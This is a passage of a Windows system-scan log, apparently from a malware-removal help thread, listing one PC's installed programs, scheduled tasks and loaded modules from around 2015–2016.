Brother MFL-Pro Suite DCP-J4110DW (HKLM-x32\...\{DD98C438-D769-4677-AA87-3481FA32D20C}) (Version: 2.0.0.0 - Brother Industries, Ltd.)
Catalyst Control Center Next Localization BR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHS (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CHT (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization CS (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DA (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization DE (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization EL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization ES (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FI (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
Clicker Heroes (HKLM-x32\...\Steam App 363970) (Version: - Playsaurus)
Contagion (HKLM-x32\...\Steam App 238430) (Version: - Monochrome LLC)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version: - Valve)
Curse (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
DayZ (HKLM-x32\...\Steam App 221100) (Version: - Bohemia Interactive)
Diablo III (HKLM-x32\...\Diablo III) (Version: - Blizzard Entertainment)
Dota 2 (HKLM-x32\...\Steam App 570) (Version: - Valve)
Elements 11 Organizer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
f.lux (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Flux) (Version: - )
Full Tilt Poker (HKLM-x32\...\{D4C9692E-4EFA-4DA0-8B7F-9439466D9E31}) (Version: 5.44.1.WIN.FullTilt.COM - )
Garry's Mod (HKLM-x32\...\Steam App 4000) (Version: - Facepunch Studios)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Drive (HKLM-x32\...\{EF61675D-9BBC-4EC7-B906-F13BE8D3BD20}) (Version: 1.27.1227.2094 - Google, Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version: - Blizzard Entertainment)
IBM SPSS Statistics 23 (HKLM\...\{C3BA73A4-2A45-4036-8541-4F5F8146078B}) (Version: 23.0.0.0 - IBM Corp)
iExplorer 3.6.1.0 (HKLM-x32\...\{7FD8B0C1-CDDA-4B4D-A577-B2E3570EA3A3}_is1) (Version: - Macroplant LLC)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3308 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation)
Internode Monthly Usage Meter 8.6.3 (HKLM-x32\...\Internode Monthly Usage Meter_is1) (Version: - )
iTunes (HKLM\...\{88509E20-3936-4D88-A1C0-B274C7BB5151}) (Version: 12.3.0.44 - Apple Inc.)
Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
Java 8 Update 74 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218074F0}) (Version: 8.0.740.2 - Oracle Corporation)
League of Legends (HKLM-x32\...\League of Legends 3.0.0) (Version: 3.0.0 - Riot Games)
League of Legends (x32 Version: 3.0.0 - Riot Games) Hidden
Left 4 Dead 2 (HKLM-x32\...\Steam App 550) (Version: - Valve)
Logitech G35 (HKLM\...\{27607A94-33AC-4AA7-AACE-95AF6ACA3E30}) (Version: 1.1.178 - Logitech)
Logitech Gaming Software 8.70 (HKLM\...\Logitech Gaming Software) (Version: 8.70.315 - Logitech Inc.)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.410 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.410 - LogMeIn, Inc.) Hidden
Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Marvel Heroes 2015 (HKLM-x32\...\Steam App 226320) (Version: - Gazillion Entertainment)
Metro: Last Light (HKLM-x32\...\Steam App 43160) (Version: - 4A Games)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Middle Earth Shadow of Mordor (HKLM-x32\...\Middle Earth Shadow of Mordor_is1) (Version: - )
Monaco What's Yours Is Mine (HKLM-x32\...\Monaco What's Yours Is Mine_is1) (Version: Monaco What's Yours Is Mine - )
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
Nitronic Rush (IGF Pro 2012) version 20111017.0 (HKLM-x32\...\{9B55759D-424F-4CB1-B84E-AAE83CC1D20A}_is1) (Version: 20111017.0 - DigiPen)
Nuance PaperPort 12 (HKLM-x32\...\{88B5FBDC-967D-4B1F-B291-39284AE12201}) (Version: 12.1.0005 - Nuance Communications, Inc.)
Nuance PDF Viewer Plus (HKLM-x32\...\{28656860-4728-433C-8AD4-D1A930437BC8}) (Version: 5.30.3290 - Nuance Communications, Inc)
NVIDIA PhysX (HKLM-x32\...\{80407BA7-7763-4395-AB98-5233F1B34E65}) (Version: 9.13.1220 - NVIDIA Corporation)
ON_OFF Charge 2 B13.1028.1 (HKLM-x32\...\InstallShield_{6B4ED6F7-BB88-4945-B0C6-01410E1BAC3A}) (Version: 1.00.0000 - GIGABYTE)
ON_OFF Charge 2 B13.1028.1 (x32 Version: 1.00.0000 - GIGABYTE) Hidden
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version: - )
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
Outils de vérification linguistique 2013 de Microsoft Office*- Français (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
PaperPort Image Printer 64-bit (HKLM\...\{715CAACC-579B-4831-A5F4-A83A8DE3EFE2}) (Version: 14.00.0000 - Nuance Communications, Inc.)
PokerStars (HKLM-x32\...\PokerStars) (Version: - PokerStars)
PRE11 STI 64Installer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
Razer Chroma SDK Core Components (HKLM-x32\...\Razer Chroma SDK) (Version: 1.2.4 - Razer Inc.)
Razer Synapse (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 1.18.21.28188 - Razer Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Remote Mouse version 2.70 (HKLM-x32\...\{01E4BC6D-3ACC-45E1-8928-C2FF626F63F3}_is1) (Version: 2.70 - Remote Mouse)
Scansoft PDF Professional (x32 Version: - ) Hidden
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft)
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (Version: - Microsoft) Hidden
Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version: - 2K Games, Inc.)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
Spotify (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Spotify) (Version: 1.0.21.143.g76c19bcd - Spotify AB)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.5.43 - Safer-Networking Ltd.)
StarCraft II (HKLM-x32\...\StarCraft II) (Version: - Blizzard Entertainment)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Team Fortress 2 (HKLM-x32\...\Steam App 440) (Version: - Valve)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.14 - TeamSpeak Systems GmbH)
TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version: - TechPowerUp)
The Elder Scrolls V: Skyrim (HKLM-x32\...\Steam App 72850) (Version: - Bethesda Game Studios)
Tom Clancy's Rainbow Six Siege (HKLM-x32\...\Steam App 359550) (Version: - Ubisoft Montreal)
Total War: ROME II (HKLM-x32\...\Steam App 214950) (Version: - Creative Assembly)
Tweaking.com - Registry Backup (HKLM-x32\...\Tweaking.com - Registry Backup) (Version: 3.3.1 - Tweaking.com)
Update for Skype for Business 2015 (KB3039776) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{0FA8AE0C-69AE-4F60-A1AB-F79C6BA5A999}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
Uplay (HKLM-x32\...\Uplay) (Version: 14.0 - Ubisoft)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
WinRAR 5.10 beta 4 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.10.4 - win.rar GmbH)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {00BB5CDE-A0A3-4126-A329-684FCE96F2DA} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {025E3B95-A6D2-4C85-BD24-71C170E5A887} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2014-09-10] ()
Task: {050D098B-C2C3-4064-986C-7B3596E444B9} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {052BB96E-EC57-4A5E-A676-5F530A65E1E1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-07] (Google Inc.)
Task: {105E72D9-5D9B-4EBD-BC8B-F6126EAAA214} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {111506E3-934F-4F4D-9D88-D03FD254704B} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-07-16] (Adobe Systems Incorporated)
Task: {12E05F11-8F42-466E-B87E-05F00D57783A} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {154B1B4C-8AD3-4E88-87B8-08F151623FF3} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {19DDEC2D-39E9-4390-B737-F534A99F91FC} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {2F2930D6-5ED7-4563-8CC0-D92C411FA7B9} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-02-12] (Microsoft Corporation)
Task: {3E5A6177-182D-4F8D-A9F3-8E88742C9F43} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
Task: {3F60BAAC-153B-4504-9150-B1875260A145} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015-08-27] (Apple Inc.)
Task: {4444829F-A5AF-49DC-AF46-C3F292BDE7F4} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-14] (Adobe Systems Incorporated)
Task: {4A494596-5721-43AD-B292-95778C23DE63} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [2015-06-16] (Safer-Networking Ltd.)
Task: {4C4DB1A9-42FA-4381-9A15-5850F64B0A92} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {57517555-5931-478E-AC60-FE526E78EA1D} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {5AE7144B-08D0-4C2C-83D2-0E78DFE05C4D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe
Task: {672C6DB8-E782-46C4-862A-91937DDD6CCD} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {6A6EF366-2189-44F1-810D-31ADBAD25AD5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-07] (Google Inc.)
Task: {6EC4A1B2-08CF-4BE5-86DE-014C8ED8CEFF} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {70F8276A-CEAC-48F6-AF84-A7EF81E36D85} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {8E8CEF76-7805-4BD1-90FE-CC39F53EDC96} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {9F538C47-5B98-42B5-A6A0-FFC9989F17DE} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {A39A9765-388B-4CFB-9115-FF2DE387651A} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {AD51084B-8DF2-45A4-A9D7-BB445D07A559} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {B771CEDA-ABD2-43D9-9157-9B1E2DEE95CB} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {B7A49348-60C5-42CB-A154-78E339B9B4EE} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe
Task: {C16563DF-BFCB-40D7-BD4E-0C8FFFFCE317} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {C4FE1DCE-FEAA-4B30-95BA-F1A5394963A4} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [2015-06-16] (Safer-Networking Ltd.)
Task: {C85142E9-7D8C-4BBB-8B73-0987957BAFF6} - System32\Tasks\AMD Updater => C:\Program Files\AMD\CIM\\Bin64\InstallManagerApp.exe [2015-12-04] (Advanced Micro Devices, Inc.)
Task: {CA6266EC-F1C1-4C19-AA06-B0AD8D0AB114} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {CD7F75C4-6EF1-4B40-A64D-B4F4D874B8BC} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [2015-06-16] (Safer-Networking Ltd.)
Task: {DD980370-DE9B-48AE-8689-09B4DE7A48CE} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {E4C27559-2796-43A7-BB20-D17DF93E1921} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {E645F142-F242-4000-9AAD-6E453D099B5F} - System32\Tasks\{87D6A7E6-7111-4A2D-8253-E40D040C3BA9} => pcalua.exe -a F:\Seagate\Setup.exe -d F:\Seagate
Task: {EA61F2D7-4B50-4E49-896F-214D33BA8108} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {EB850747-54A4-4253-8644-DD8AF435E430} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {F27906F8-C2D3-459A-A01E-D551D7DB510D} - \{780C0A47-0B7D-7E7E-0B11-780C0D7E1109} -> No File <==== ATTENTION
Task: {F90E1ADE-C9DD-4465-8DAC-587FA30703FB} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2015-07-02] (Avast Software s.r.o.)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
==================== Loaded Modules (Whitelisted) ==============
2015-07-10 21:00 - 2015-07-10 21:00 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-08-09 19:24 - 2015-08-09 19:24 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-05-15 16:26 - 2015-05-15 16:26 - 00085832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-09-15 14:25 - 2015-09-15 14:25 - 01328912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-08-19 18:35 - 2015-08-11 19:14 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-11-05 10:11 - 2015-11-05 10:12 - 00188072 _____ () C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
2014-09-10 18:09 - 2005-04-22 14:36 - 00143360 _____ () C:\WINDOWS\system32\BrSNMP64.dll
2015-10-01 14:23 - 2015-09-17 16:48 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-10-01 14:23 - 2015-09-17 16:48 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2015-09-15 14:58 - 2015-09-15 14:58 - 08901184 _____ () D:\Microsoft Office 2013\Office15\1033\GrooveIntlResource.dll
2015-10-01 14:23 - 2015-09-17 15:48 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-07-10 20:59 - 2015-07-10 20:59 - 00143360 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\XamlTileRendering.dll
2015-12-15 18:55 - 2015-11-25 14:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-15 18:55 - 2015-11-25 14:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-15 18:55 - 2015-11-25 14:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-10-01 14:23 - 2015-09-17 15:43 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-07-10 21:00 - 2015-07-10 23:14 - 00210432 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll
2015-03-07 10:07 - 2015-03-07 10:07 - 00908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2015-07-02 10:28 - 2015-07-02 10:28 - 01095448 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-07 10:07 - 2015-03-07 10:07 - 00060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2015-07-02 10:28 - 2015-07-02 10:28 - 00240408 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2015-06-25 16:34 - 2015-06-25 16:34 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2015-06-25 16:37 - 2015-06-25 16:37 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2015-06-25 16:35 - 2015-06-25 16:35 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2015-06-25 16:38 - 2015-06-25 16:38 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2015-06-25 15:53 - 2015-06-25 15:53 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
2015-06-25 15:51 - 2015-06-25 15:51 - 02013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2015-12-21 17:55 - 2015-12-21 17:55 - 00292352 _____ () C:\ProgramData\Razer\Synapse\RzStats\RzStats.Manager.exe
2015-07-02 13:20 - 2015-07-02 13:20 - 00104400 _____ () C:\Program Files\AVAST Software\Avast\log.dll
2015-07-02 13:20 - 2015-07-02 13:20 - 00081728 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2016-03-01 12:14 - 2016-03-01 12:14 - 02835456 _____ () C:\Program Files\AVAST Software\Avast\defs\16022901\algo.dll
2016-03-01 20:49 - 2016-03-01 20:49 - 02836480 _____ () C:\Program Files\AVAST Software\Avast\defs\16030100\algo.dll
2016-02-28 18:50 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2016-02-28 18:50 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2016-02-28 18:50 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
2016-02-28 18:50 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
2016-02-26 06:50 - 2016-02-18 14:14 - 01630360 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libglesv2.dll
